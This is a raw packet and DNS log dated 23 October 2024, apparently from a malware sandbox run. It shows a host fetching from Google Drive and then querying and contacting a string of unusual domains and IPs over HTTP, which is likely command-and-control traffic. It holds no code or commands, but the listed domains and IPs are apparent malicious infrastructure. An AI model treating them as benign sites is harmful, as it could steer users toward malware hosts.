                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.753099918 CEST8049868162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.813774109 CEST8049868162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.813819885 CEST8049868162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:15.813986063 CEST4986880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:17.151890993 CEST4986880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.169356108 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.285113096 CEST8049869162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.285365105 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.290411949 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.406124115 CEST8049869162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.553623915 CEST8049869162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:18.604684114 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:23.554765940 CEST8049869162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:23.555152893 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:23.555746078 CEST4986980192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:58:23.671519995 CEST8049869162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.573942900 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.769198895 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.769460917 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.777250051 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972285986 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972397089 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972409964 CEST8049870185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:28.972553968 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:30.289815903 CEST4987080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.307132006 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.503833055 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.504009008 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.511482000 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708067894 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708153009 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708162069 CEST8049871185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:31.708352089 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:33.023583889 CEST4987180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.041023016 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.238210917 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.238428116 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246052980 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.246110916 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.442811966 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443036079 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443043947 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443314075 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443322897 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443332911 CEST8049872185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:34.443490028 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:35.757244110 CEST4987280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.774754047 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.967714071 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.967988968 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:36.972995043 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.165986061 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166337967 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166614056 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166738987 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166871071 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166883945 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166932106 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.167144060 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.170315981 CEST4987380192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.362822056 CEST8049873185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.179903030 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.274044991 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.274260998 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.281696081 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.375658989 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608000994 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608059883 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608110905 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608160973 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608203888 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608246088 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608278990 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608316898 CEST8049874172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608481884 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:43.786902905 CEST4987480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.804322958 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.898863077 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.899074078 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.906498909 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.000824928 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272495985 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272557974 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272607088 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272654057 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272697926 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272739887 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272773027 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272825956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272965908 CEST8049875172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273000956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273000956 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.273160934 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:46.411290884 CEST4987580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.428760052 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.523351908 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.523616076 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531887054 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531953096 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626652956 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626694918 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.626811981 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627008915 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627052069 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627079964 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.627151966 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875664949 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875766993 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875781059 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875791073 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875801086 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875902891 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875914097 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875961065 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.875961065 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.876131058 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.876738071 CEST8049876172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.876899958 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:49.035821915 CEST4987680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.053222895 CEST4987780192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.148478031 CEST8049877172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.148694038 CEST4987780192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.153589010 CEST4987780192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.248707056 CEST8049877172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.495031118 CEST8049877172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.496198893 CEST8049877172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.496361017 CEST4987780192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.498755932 CEST4987780192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:58:50.594032049 CEST8049877172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.505469084 CEST4987880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.605278969 CEST80498783.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.605504036 CEST4987880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.612921953 CEST4987880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:55.712749958 CEST80498783.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:56.612166882 CEST80498783.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:56.612400055 CEST4987880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:57.127830982 CEST4987880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:57.227946043 CEST80498783.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.145344973 CEST4987980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.245732069 CEST80498793.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.245923996 CEST4987980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.253422976 CEST4987980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.353552103 CEST80498793.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.355336905 CEST80498793.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:58:58.355482101 CEST4987980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:59.767885923 CEST4987980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:58:59.868211031 CEST80498793.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.785485983 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.885106087 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.885564089 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.894787073 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.894844055 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.994621038 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.994666100 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.994879007 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.995172977 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.995213985 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.995404005 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.995445967 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.996510029 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:00.996705055 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:02.407963037 CEST4988080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:02.507191896 CEST80498803.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.425414085 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.524936914 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.525162935 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.530150890 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:03.629611969 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.545911074 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.545959949 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.546231031 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.548016071 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.553385019 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.553957939 CEST4988180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:06.647655010 CEST80498813.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.564389944 CEST4988280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.664309978 CEST80498823.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.664468050 CEST4988280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.678843975 CEST4988280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.779278040 CEST80498823.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.781738997 CEST80498823.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:11.781951904 CEST4988280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:13.186892033 CEST4988280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:13.287257910 CEST80498823.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.204447031 CEST4988380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.307190895 CEST80498833.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.307447910 CEST4988380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.314918041 CEST4988380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.416924953 CEST80498833.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.417325020 CEST80498833.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:14.417557955 CEST4988380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:15.826983929 CEST4988380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:15.927809000 CEST80498833.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.844388008 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.943830967 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.944052935 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.951644897 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.951697111 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:16.951744080 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.051446915 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.051692009 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.051733971 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.051763058 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.051974058 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.052036047 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.052067041 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.961572886 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:17.961771965 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:18.467097044 CEST4988480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:18.594072104 CEST80498843.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:19.484726906 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:19.589799881 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:59:19.590059996 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:19.595108986 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:59:19.708677053 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.713668108 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.713689089 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.713956118 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.715959072 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.721754074 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.721843958 CEST4988580192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 19:00:19.815375090 CEST80498853.33.130.190192.168.11.20
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.494760036 CEST5393653192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.589616060 CEST53539361.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.082896948 CEST5537553192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.178540945 CEST53553751.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:26.863593102 CEST6344553192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:53:27.188555002 CEST53634451.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.635442972 CEST5642653192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.756848097 CEST53564261.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:53:55.897895098 CEST5615253192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.005949020 CEST53561521.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.441939116 CEST5780953192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.609085083 CEST53578091.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.751192093 CEST5679953192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.921046972 CEST53567991.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.262746096 CEST5339853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.377896070 CEST53533981.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:54.978439093 CEST5535253192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.089535952 CEST53553521.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.428690910 CEST6315253192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.590976000 CEST53631521.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.678219080 CEST5053353192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.816339016 CEST53505331.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.000207901 CEST5991753192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.132436991 CEST53599171.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.308197021 CEST5241553192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:55:59.555155039 CEST53524151.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.695924997 CEST6228053192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:12.803216934 CEST53622801.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.052464962 CEST5224653192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:26.167007923 CEST53522461.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.721496105 CEST5412053192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:39.928355932 CEST53541201.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.046901941 CEST5807153192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:56:53.675441027 CEST53580711.1.1.1192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.543816090 CEST6332853192.168.11.201.1.1.1
                                                                                                                                                                                                                        Oct 23, 2024 18:57:07.869746923 CEST53633281.1.1.1192.168.11.20
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Oct 23, 2024 18:52:49.494760036 CEST192.168.11.201.1.1.10x586cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:52:50.082896948 CEST192.168.11.201.1.1.10xe38Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:26.863593102 CEST192.168.11.201.1.1.10x1ee0Standard query (0)www.caprinaday.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:42.635442972 CEST192.168.11.201.1.1.10x3cd0Standard query (0)www.how2.guruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:53:55.897895098 CEST192.168.11.201.1.1.10xb19Standard query (0)www.ruarlo.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.441939116 CEST192.168.11.201.1.1.10xe02eStandard query (0)www.refs4refs.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.751192093 CEST192.168.11.201.1.1.10xe1cdStandard query (0)www.estrela-b.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.262746096 CEST192.168.11.201.1.1.10x95b8Standard query (0)www.russe-trykk.onlineA (IP address)IN (0x0001)false
